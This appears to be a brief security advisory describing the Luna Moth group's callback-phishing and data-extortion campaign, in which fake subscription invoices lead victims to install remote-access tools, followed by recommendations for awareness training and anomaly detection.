Fake Subscription Invoices
Beware of fake subscription invoices – they could lead to data theft and extortion.
Threat Actor: Luna Moth
A hacker group known as Luna Moth has been using social engineering and trusted software to steal sensitive data and extort money from small businesses.
The group has chosen not to use ransomware, instead focusing on targeted employees who call a phone number and are convinced by the attackers to install a trusted remote access tool.
Threat Landscape
Phase I
Callback phishing, also called telephone-oriented attack delivery (TOAD), is a social engineering attack in which the attacker interacts with the target to achieve their objectives. This type of attack has a higher success rate. The scammers email fake subscription invoices that look like they're coming from legitimate businesses, claiming the recipient has subscribed to a service and that payment will be extracted automatically via the payment method specified by the recipient. The phishing email doesn't contain any clickable links or attachments that would set off security features. The email contains a phone number the recipient calls to dispute the subscription, and a confirmation number that is used by the threat actors. The PDF file attached also includes this information.
Phase II
When the victim called they were connected to a bad actor who then sent a remote assist invitation for Zoho Assist-a remote support tool. After the victim logged into the session, the attacker took control of their keyboard and mouse functions, allowed access to their clipboard, and darkened their screen to conceal what they were doing.
Phase III
To remain connected after leaving the session, the threat actor installs trusted remote support software Syncro for persistence and open source file management tools Rclone or WinSCP to exfiltrate data. This attack does not require administrative privileges and can run within the user’s security context. The attacker searched for sensitive data, download it, then follow up with an email where they threatened to sell or leak this data unless a ransom is paid.
Conclusion
Unit 42 researchers have discovered that the group has started by targeting small- to medium-sized businesses in the legal industry, but retail sector companies are now also being victimized
Organizations should invest in:
Cybersecurity awareness training programs with a drill-down on unexpected invoices, as well as requests to establish a phone call or to install software.
Cybersecurity tools designed to detect and prevent anomalous activity (for example, installing unrecognized software or exfiltrating sensitive data).